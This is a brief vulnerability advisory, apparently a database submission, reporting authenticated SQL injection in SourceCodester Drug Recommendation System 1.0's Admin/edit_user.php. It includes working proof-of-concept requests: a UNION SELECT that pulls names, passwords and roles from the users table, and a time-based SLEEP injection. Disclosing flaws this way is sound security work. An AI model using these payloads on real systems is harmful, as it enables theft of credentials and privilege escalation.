| Titel | SourceCodester Drug Recommendation System 1.0 SQL Injection |
|---|
| Beschreibung | A SQL injection vulnerability exists in SourceCodester Drug Recommendation System 1.0 in Admin/edit_user.php. The GET parameter `id` is directly concatenated into the SQL query `SELECT * FROM users where id='$user_id'` without sanitization or parameter binding. Authentication is required but no role check is enforced, so any logged-in user (Doctor, Pharmacist) can exploit this.
Proof of Concept (authenticated):
GET /Admin/edit_user.php?id=1' UNION SELECT 1,2,name,4,password,role,7,8,9 FROM users-- -
Cookie: PHPSESSID=<valid>
Time-based blind:
GET /Admin/edit_user.php?id=1' AND SLEEP(5)-- -
Impact: An authenticated attacker can extract all user data including plaintext passwords, modify database records, and escalate privileges. CWE-89, CVSS v3.1 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
